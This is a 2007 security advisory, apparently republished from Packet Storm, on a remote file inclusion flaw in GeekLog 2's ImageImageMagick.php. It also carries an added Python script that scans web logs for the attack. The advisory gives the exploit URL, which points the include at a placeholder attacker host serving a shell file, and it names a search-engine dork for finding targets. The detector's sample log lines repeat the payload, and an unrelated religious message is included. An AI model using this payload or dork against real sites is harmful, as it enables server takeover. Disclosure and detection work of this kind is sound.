geeklog2-rfi.txt

21 May 2007 · Reported by diesl0w · Type: packetstorm · Source: packetstormsecurity.com

Remote file inclusion (RFI) vulnerability in GeekLog 2.* (ImageImageMagick.php); a security measure is required.

`--------------------------------[ 05/18/2007 ]---------------------------------  
  
GeekLog 2.* (ImageImageMagick.php) RFI Vuln  
  
-dsd863 [at] yahoo.com-   
---------------------------------[ Contacts ]---------------------------------  
  
diesl0w @ UnderNET  
#hackphreak #oldskewl #ubergeeks #linux.edu #linuxhq  
  
----------------------------------[ Credit ]----------------------------------  
  
rgod <rgod [at] autistici.org> for his original BaseView.php RFI find  
  
---------------------------------[ Download ]---------------------------------  
  
http://www.geeklog.net/nightly/geeklog2-cvs-nightly.tar.gz  
  
---------------------------------[ Vuln Code ]--------------------------------  
  
[geeklog path]/system/ImageImageMagick.php?glConf[path_system]=http://www.badsite.com/shell.txt?  
  
  
-----------------------------------[ Issue ]----------------------------------  
  
-Line 3 of ImageImageMagick.php-  
  
require $glConf['path_system'] . 'BaseImage.php';  
  
-----------------------------------[ Google ]----------------------------------  
  
"Powered By Geeklog"  
  
----------------------------------[ Solution ]---------------------------------  
Change php.ini and set allow_url_fopen to Off  
(Not tested but disabling URL-Access will fix the issue)  
  
or  
  
Insert the following code before line 3:  
  
if (strpos ($_SERVER['PHP_SELF'], 'ImageImageMagick.php') !== false){ die('Cant access file by itself.'); }  
  
----------------------------[ Word from my sponsor ]---------------------------  
  
Non-Christians: We were born sinners in need of a fix. Without Jesus as a we are going to hell. point blank  
Christians: Keep passing the faith. Crucify yourself daily. When you fall, get back up.  
  
Romans 3:23  
"for all have sinned and fall short of the glory of God"  
  
Romans 6:23  
"For the wages of sin is death, but the gift of God is eternal life through Jesus Christ our Lord."  
  
Romans 10:9  
"That if you confess with your mouth, "Jesus is Lord," and believe in your heart that God raised him from the dead, you will be saved."  
  
`
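
A log-review sketch for the request pattern shown under "Vuln Code", added here as an example and not part of the original advisory: it flags requests that set `glConf` or `glConf[...]` to a URL, whether the parameter arrives raw or percent-encoded. The combined log format, the sample lines and the premise that no legitimate client ever supplies `glConf` are assumptions made for illustration, and the match covers any `scheme://` value rather than only `http`.

```python
import re
from urllib.parse import parse_qsl

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# A parameter value that starts with scheme:// (http, https, ftp, ...)
URL_VALUE = re.compile(r"^\s*[a-z][a-z0-9+.-]*://", re.IGNORECASE)


def injected_config(target, var="glConf"):
    """Return (name, value) pairs where var or var[...] is set to a URL."""
    _path, _, query = target.partition("?")
    hits = []
    # parse_qsl percent-decodes names and values, so glConf%5Bpath_system%5D
    # is compared in the same form the PHP application would see it.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if (name == var or name.startswith(var + "[")) and URL_VALUE.match(value):
            hits.append((name, value))
    return hits


def scan(lines):
    """Return (line_number, path, name, value) for every flagged request."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        target = match.group(1)
        for name, value in injected_config(target):
            findings.append((number, target.partition("?")[0], name, value))
    return findings


# Constructed sample log lines (documentation-range client addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/May/2007:10:00:01 +0000] "GET /geeklog/index.php?topic=news HTTP/1.1" 200 5120',
    '198.51.100.7 - - [21/May/2007:10:00:05 +0000] "GET /geeklog/system/ImageImageMagick.php?glConf[path_system]=http://www.badsite.com/shell.txt? HTTP/1.1" 200 312',
    '198.51.100.7 - - [21/May/2007:10:00:09 +0000] "GET /geeklog/system/ImageImageMagick.php?glConf%5Bpath_system%5D=http%3A%2F%2Fwww.badsite.com%2Fshell.txt%3F HTTP/1.0" 200 312',
    '192.0.2.44 - - [21/May/2007:10:01:00 +0000] "GET /geeklog/search.php?query=glConf+http://example.org HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The script path is reported but not used as a filter, so the same check also surfaces the parameter when it is sent to other files that include from `$glConf['path_system']`.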

Vulners AI Score: 7.4 (High risk)